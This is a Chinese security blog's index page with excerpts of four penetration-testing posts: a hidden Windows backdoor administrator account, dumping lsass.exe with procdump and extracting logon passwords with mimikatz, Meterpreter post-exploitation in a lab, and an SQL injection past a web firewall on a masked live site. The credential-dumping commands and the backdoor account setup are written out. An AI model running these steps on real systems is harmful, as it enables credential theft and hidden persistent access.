摘要:
windows服务隐藏后门之克隆帐号 1、CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。 PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。 2、“开 阅读全文
posted @ 2019-03-11 20:41
卿先生
阅读(2706)
评论(0)
推荐(0)
摘要:
1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords fu 阅读全文
posted @ 2019-03-11 20:37
卿先生
阅读(2776)
评论(0)
推荐(0)
摘要:
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp靶机 192.168.190.140 生成木马 监听反弹shell上线 信息收集: 0x01进程迁移 阅读全文
posted @ 2019-03-11 10:35
卿先生
阅读(1573)
评论(0)
推荐(0)
摘要:
记一次SQL注入 目标地址:https://www.xxxx.com/ 之前补天提交过这个注入 后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字) 不过今天试了下 还是可以注入 可以看到已经有安全狗拦截get方式的注入字符 目标站是伪静态重写了url 改一下提交规则即可 改成post提交(默 阅读全文
posted @ 2019-03-11 09:05
卿先生
阅读(2807)
评论(0)
推荐(0)
浙公网安备 33010602011771号